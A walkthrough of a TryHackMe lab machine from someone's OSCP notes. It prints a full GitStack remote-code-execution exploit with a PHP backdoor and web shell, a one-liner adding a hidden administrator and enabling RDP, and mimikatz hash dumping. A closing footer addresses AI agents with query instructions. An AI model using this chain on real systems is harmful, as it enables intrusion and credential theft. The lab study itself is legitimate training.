# 80 ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d271d07fc03653e536832ce8d737a4c57135bfc4%2F041f91201ec5ecdb299bac0aac1dec1b.png?alt=media) Using this [exploit](https://github.com/snix0/GitStack-RCE-Exploit-Shell/blob/master/exploit.py) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-fe0e364411ce7134c4aa304dc41ee5ff341c38fe%2Fd9d8c224566180ae1cb9a42e0a8dc2b9.png?alt=media) Ip and command are changed so that we can execute our custom command. ```python # Original exploit code based on PoC from Kacper Szurek (https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html) import requests from requests.auth import HTTPBasicAuth import os import sys # Change IP to target ip = '10.200.101.150' # What command you want to execute command = "ping -c 2 10.50.102.111" repository = 'rce' username = 'rce' password = 'rce' csrf_token = 'token' user_list = [] print "[+] Get user list" try: r = requests.get("http://{}/rest/user/".format(ip)) user_list = r.json() user_list.remove('everyone') except: pass if len(user_list) > 0: username = user_list[0] print "[+] Found user {}".format(username) else: r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password}) print "[+] Create user" if not "User created" in r.text and not "User already exist" in r.text: print "[-] Cannot create user" os._exit(0) r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip)) if "true" in r.text: print "[+] Web repository already enabled" else: print "[+] Enable web repository" r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}') if not "Web interface successfully enabled" in r.text: print "[-] Cannot enable web interface" os._exit(0) print "[+] Get repositories list" r = requests.get("http://{}/rest/repository/".format(ip)) repository_list = r.json() if len(repository_list) > 0: repository = repository_list[0]['name'] print "[+] Found repository {}".format(repository) else: print "[+] Create repository" r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token}) if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text: print "[-] Cannot create repository" os._exit(0) print "[+] Add user to repository" r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username)) if not "added to" in r.text and not "has already" in r.text: print "[-] Cannot add user to repository" os._exit(0) print "[+] Disable access for anyone" r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone")) if not "everyone removed from rce" in r.text and not "not in list" in r.text: print "[-] Cannot remove access for anyone" os._exit(0) print "[+] Create backdoor in PHP" r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "" > c:\GitStack\gitphp\exploit.php')) print r.text.encode(sys.stdout.encoding, errors='replace') print "[+] Starting interactive shell" while True: cmd = raw_input("$ ") if cmd == 'exit': print "Exiting shell..." sys.exit(0) else: r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : cmd}) print r.text.encode(sys.stdout.encoding, errors='replace') ``` We can now execute the exploit: ``` python2.7 exploit.py ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-caffd6dc29baf8466803239d34ffbe149bb1bbf1%2F14d607b9ac7866f9bb82d277877e556a.png?alt=media) We now have command execution. And we are already `nt authority\system` This machine has an active firewall so attempts to transfer files were futile. Running this oneliner to get rdp access: ``` net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable ``` Now connecting: ``` xfreerdp /u:hacker /p:'Hacker123!' /v:10.200.101.150 /cert-ignore /compression /auto-reconnect /drive:/home/kali/Documents/Windows,Windows +clipboard ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ba714f781f492d0cfb4556c554f2bc88332ae5ae%2F6132ddf2361f3a6c3af3064df3d5910b.png?alt=media) And we mounted our folder with windows tools: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-295179a332329b7558490bf16d7cfc959a838e08%2F1a0c5e25241f25077c4969aa00579708.png?alt=media) We can copy needed files to Downloads folder and add our user to Remote Management Users group: ``` net localgroup "Remote Management Users" hacker /add ``` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-83076954166dbb063a5e97500dd51c6dc69f3754%2F1cbd42a8bdf9048aaa10fc989b8cefd8.png?alt=media) now running mimikatz as Administrator by right-clicking: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d4d5c5efe57b85d70c0e44c99da8393b627345f7%2F7d3d8c2b5ee4b6bcecc43533fca35dc3.png?alt=media) We get the hash for Administrator. We also get hashes for Thomas: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c8cb89a78882e0004591acae523efeeb49e12d54%2Fe17e3ade8ff3b779b6b249d1589a9998.png?alt=media) We can try cracking in crackstation: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8f02ab70a074b2ab45bac24d4fd1a2bead5a0d28%2F7996540d1d14592757f05a1afa8f3f49.png?alt=media) Thomas hash can be cracked. Administrator hash was not cracked. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/walkthroughs/try-hack-me/wreath/ms02/80.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.